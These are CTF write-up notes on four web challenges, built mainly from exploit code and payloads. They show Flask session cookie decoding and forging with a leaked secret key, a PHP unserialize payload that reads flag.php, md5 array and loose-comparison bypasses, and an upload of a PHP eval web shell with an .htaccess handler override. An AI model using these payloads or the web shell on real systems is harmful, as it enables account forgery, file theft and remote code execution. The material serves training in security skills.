[HCTF 2018]admin
import sys
import zlib
from flask. sessions import session_json_serializer
from itsdangerous import base64_decode
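def decryption(payload):
    """Decode the body of a Flask client-side session cookie without verifying it.

    The cookie is parsed as ``[.]<base64 payload>.<timestamp>.<signature>``; a
    leading ``.`` marks a zlib-compressed payload.  Flask session cookies are
    signed, not encrypted, so despite the name nothing is decrypted here: any
    holder of the cookie can read its contents.

    The signature and timestamp are split off and never checked, so the value
    returned is unauthenticated and must be treated as untrusted input.  The
    integrity of a session rests solely on the secrecy and strength of the
    application's ``SECRET_KEY``.

    Args:
        payload: Raw cookie value as ``bytes``.

    Returns:
        The deserialized session contents.

    Raises:
        ValueError: If the cookie does not contain the two ``.`` separators.
        Exception: If base64 decoding or zlib decompression fails; the
            underlying error is chained as ``__cause__``.
    """
    # Peel off "<signature>" and then "<timestamp>"; neither is validated.
    payload, _sig = payload.rsplit(b'.', 1)
    payload, _timestamp = payload.rsplit(b'.', 1)

    # A leading dot is the marker for a compressed payload.
    compressed = payload.startswith(b'.')
    if compressed:
        payload = payload[1:]

    try:
        payload = base64_decode(payload)
    except Exception as e:
        # Chain the cause so the real decoding error stays visible.
        raise Exception('Could not base64 decode the payload because of '
                        'an exception') from e

    if compressed:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload') from e

    return session_json_serializer.loads(payload)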
if __name__ == '__main__':
    # The cookie value arrives as the first command-line argument and is
    # handed to decryption() as bytes.
    cookie = sys.argv[1]
    print(decryption(cookie.encode()))
$ python3 flask_session_decode.py .eJw9kEGLgzAQhf_KMuceTLSXQg9C2sWFGXGJDcmldFdrjKYLtmXV0v--sYc9DcwbvvfePOB4Huqrhc1tuNcrOLYVbB7w9gUbML6ISRYMObUouxFlM-VKxzjjLwkdGYU8l12sVZYstyh6i0qzXBx69Ls4F3tLc7NGH6b7cCjSEVU5GkU2F81EPIvJNZy48dodgt5FxnXMuHJEX6y17C0pY-ndtEbsEi3TmVQZGZlNJKsORTnmovIo0y08V_B9Hc7H209XX_4roMuiYLFEnFFlAVmwUGnSvIz0rDm6vdX-05NLkyXqsqdi-8JdTr4OiFPl2wtjsIL7tR5e_wEWwfMPgflkfg.Yk6DiQ.oMMh8zI-cCtKvp3iUUCQICevNBE
{ '_fresh' : True, '_id' : b'fd75453cb1911829f7330464ec6997ab8fd709a1f585e2a781a7892aa62c0011e1eca8827b76867ffb5c094f95f512d9a9a5fa4fbd18a035e4e2257d05187f10' , 'csrf_token' : b'224687ab31b9a45542ce4c6621abdf608789ce45' , 'name' : 'admin11' , 'user_id' : '10' }
$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager
$ python -m venv venv
$ source venv/bin/activate
$ python setup.py install
$ python3 flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'fd75453cb1911829f7330464ec6997ab8fd709a1f585e2a781a7892aa62c0011e1eca8827b76867ffb5c094f95f512d9a9a5fa4fbd18a035e4e2257d05187f10', 'csrf_token': b'224687ab31b9a45542ce4c6621abdf608789ce45', 'name': 'admin', 'user_id': '10'}"
.eJw9kEFrg0AQhf9KmbMHXc1FyEHYpFiYEcuaZfcS0mpcV9eCJlQN-e_VHHoamDd87715wPk6VKOB-DbcKw_OTQnxA96-IAbt8pBEHiCjBkU7oajnTKoQF_wlrnwtkWWiDZVMo-0WeWdQqiDjpw7dIcz40dBS79Ct035Y5MmEspi0JJPxeiaWhmRrRkw7ZU-r3vratoG2xYQu3ynRGZLa0LtuND9ESiQLycLXIp1JlC3yYsp46VAke3h68D0O1_Ptp636_wpoU3-12CIuKNMVmQdrpVmxwleLYmiPRrlPRzaJtqjbnvL9C9dfXLUiLqVrevDgPlbD6zsQ-PD8A7xPZBw.Yk6FMw.Cq0nNGMXyUTx-wjf3sn3FQRAkBE
flag{734305d9-ed05-4194-8796-1449b16a914d}
[网鼎杯 2020 青龙组]AreUSerialz
< ? php
// Pulls in flag.php; nothing in this listing prints its contents directly.
include ( "flag.php" ) ;
// Echoes this script's own source to every visitor, so the challenge code is public.
highlight_file ( __FILE__ ) ;
// File read/write helper whose behaviour is selected entirely by its three
// properties. Because the script below passes request data to unserialize(),
// those properties are caller-controlled for any instance created that way, and
// __destruct() runs on such instances as well.
class FileHandler {
    // Selects the action in process(): "1" writes, "2" reads.
    protected $op ;
    // Path handed to file_put_contents()/file_get_contents(); no path restriction is applied.
    protected $filename ;
    // Data written by write().
    protected $content ;
    function __construct ( ) {
        // NOTE(review): these three lines assign local variables, not
        // $this->op / $this->filename / $this->content, so the properties are
        // still unset when process() is called below.
        $op = "1" ;
        $filename = "/tmp/tmpfile" ;
        $content = "Hello World!" ;
        $this -> process ( ) ;
    }
    // Dispatches on $this->op using loose (==) comparison, so a non-string
    // value that loosely equals "1" or "2" takes the same branch as the string.
    public function process ( ) {
        if ( $this -> op == "1" ) {
            $this -> write ( ) ;
        } else if ( $this -> op == "2" ) {
            $res = $this -> read ( ) ;
            $this -> output ( $res ) ;
        } else {
            $this -> output ( "Bad Hacker!" ) ;
        }
    }
    // Writes $this->content to $this->filename when both are set and the
    // content is at most 100 bytes long.
    private function write ( ) {
        if ( isset ( $this -> filename ) && isset ( $this -> content ) ) {
            if ( strlen ( ( string ) $this -> content ) > 100 ) {
                $this -> output ( "Too long!" ) ;
                die ( ) ;
            }
            $res = file_put_contents ( $this -> filename , $this -> content ) ;
            // A falsy result (false, or 0 bytes written) is reported as "Failed!".
            if ( $res ) $this -> output ( "Successful!" ) ;
            else $this -> output ( "Failed!" ) ;
        } else {
            $this -> output ( "Failed!" ) ;
        }
    }
    // Returns the contents of $this->filename, or "" when no filename is set.
    private function read ( ) {
        $res = "" ;
        if ( isset ( $this -> filename ) ) {
            $res = file_get_contents ( $this -> filename ) ;
        }
        return $res ;
    }
    // Echoes $s into the response as-is; no HTML escaping is applied.
    private function output ( $s ) {
        echo "[Result]: <br>" ;
        echo $s ;
    }
    function __destruct ( ) {
        // Strict (===) check: only the *string* "2" is reset to "1". process()
        // compares loosely, so the guard here and the dispatcher there do not
        // agree on what counts as "2". The brace-less if covers only the next
        // statement; the two lines after it always run.
        if ( $this -> op === "2" )
            $this -> op = "1" ;
        $this -> content = "" ;
        $this -> process ( ) ;
    }
}
/**
 * Report whether every byte of $s has an ordinal between 32 and 125 inclusive.
 *
 * An empty string passes. This is only a byte-range filter: it says nothing
 * about the structure or meaning of the string, so it does not make a later
 * unserialize() call on the same data safe.
 *
 * @param string $s Input to inspect.
 * @return bool True when all bytes are within 32..125, false otherwise.
 */
function is_valid($s) {
    $length = strlen($s);
    $index = 0;
    while ($index < $length) {
        $byte = ord($s[$index]);
        if ($byte < 32 || $byte > 125) {
            return false;
        }
        $index++;
    }
    return true;
}
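// Entry point: deserializes the `str` query parameter after a byte-range check.
// NOTE(security): unserialize() on request data instantiates any declared class
// and runs its magic methods (here FileHandler::__destruct) with caller-chosen
// property values. is_valid() only limits the byte range; it does not limit
// which classes or values are accepted. For untrusted input prefer
// json_decode(), or pass ['allowed_classes' => false] as the second argument.
// The offset syntax was $_GET{'str'} originally; curly-brace offsets are a
// parse error on PHP 8, so the bracket form is used here.
if (isset($_GET['str'])) {
    $str = (string) $_GET['str'];
    if (is_valid($str)) {
        $obj = unserialize($str);
    }
}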
< ? php
// Writeup helper: declares a stand-in FileHandler with the challenge's property
// names and prints its serialize() output.
// NOTE(review): presumably run locally, not on the target — confirm.
include ( "flag.php" ) ;
highlight_file ( __FILE__ ) ;
class FileHandler
{
    // Integer 2, not the string "2".
    // Protected members are serialized with NUL-delimited name prefixes, i.e.
    // bytes outside the 32..125 range that the challenge's is_valid() accepts.
    protected $op = 2 ;
    protected $filename = "flag.php" ;
    protected $content = "Hack" ;
}
$a = new FileHandler ( ) ;
echo ( serialize ( $a ) ) ;
? >
< ? php
// Variant of the helper with public properties, so the serialized property
// names carry no NUL-delimited visibility prefix.
// NOTE(review): the writeup relies on unserialize() populating the challenge's
// protected properties from these public-named entries. Property visibility is
// therefore not a control against crafted serialized input.
class FileHandler
{
    // Integer 2, not the string "2".
    public $op = 2 ;
    public $filename = "flag.php" ;
    public $content = "Hack" ;
}
$a = new FileHandler ( ) ;
$b = serialize ( $a ) ;
echo $b ;
? >
O:11:"FileHandler" :3:{ s:2:"op" ; i:2; s:8:"filename" ; s:8:"flag.php" ; s:7:"content" ; s:4:"Hack" ; }
[MRCTF2020]Ez_bypass
I put something in F12 for you
// Challenge gate with two checks: an MD5 "collision" on two GET parameters, then
// a password check on a POST parameter. Both depend on PHP type handling, not on
// the values themselves.
include 'flag.php' ;
// Placeholder shown in the published source; this assignment follows the include.
$flag = 'MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}' ;
if ( isset ( $_GET [ 'gg' ] ) && isset ( $_GET [ 'id' ] ) ) {
    $id = $_GET [ 'id' ] ;
    $gg = $_GET [ 'gg' ] ;
    // NOTE(security): neither parameter is checked with is_string(). On PHP 7,
    // md5() given an array emits a warning and returns NULL, so two different
    // arrays give NULL === NULL while $id !== $gg still holds. PHP 8 throws a
    // TypeError instead. Reject non-string input before hashing.
    if ( md5 ( $id ) === md5 ( $gg ) && $id !== $gg ) {
        echo 'You got the first step' ;
        if ( isset ( $_POST [ 'passwd' ] ) ) {
            $passwd = $_POST [ 'passwd' ] ;
            // NOTE(security): "not numeric" and "== 1234567" look mutually
            // exclusive, but on PHP 7 the loose == converts a string's leading
            // digits to a number before comparing. PHP 8 compares as strings
            // when the string is non-numeric. Validate the type, then use ===.
            if ( ! is_numeric ( $passwd ) )
            {
                if ( $passwd == 1234567 )
                {
                    echo 'Good Job!' ;
                    // Prints the source of flag.php into the response.
                    highlight_file ( 'flag.php' ) ;
                    die ( 'By Retr_0' ) ;
                }
                else
                {
                    echo "can you think twice??" ;
                }
            }
            else {
                echo 'You can not get it !' ;
            }
        }
        else {
            die ( 'only one way to get the flag' ) ;
        }
    }
    else {
        echo "You are not a real hacker!" ;
    }
}
else {
    die ( 'Please input first' ) ;
}
} Please input first
<?php
// Suppresses all warnings and notices, including any raised for the POST
// parameters and md5() calls below.
error_reporting ( 0 ) ;
include "flag.php" ;
highlight_file ( __FILE__ ) ;
// NOTE(security): the POST values are never checked to be strings. On PHP 7,
// md5() of an array returns NULL (TypeError on PHP 8), so two different arrays
// satisfy both halves of this condition and the digest comparison proves
// nothing about the inputs. Check is_string() on each value before hashing.
if ( $_POST [ 'param1' ] !== $_POST [ 'param2' ] && md5 ( $_POST [ 'param1' ] ) === md5 ( $_POST [ 'param2' ] ) ) {
    echo $flag ;
// The text after the closing brace is output captured on the page, not PHP.
} flag{ dfbfa6e9- 60e7 - 40 f6- b649- 72 bafca9fea9}
<!-- get -->
?id[]=QNKCDZO&gg[]=s155964671a
<!-- post -->
passwd=1234567a
$flag="flag{f79c3177-3c89-4c6f-bc85-7f972274b20b}"
[MRCTF2020]你传你🐎呢
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg
<?php @eval($_POST['hack']) ?>
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>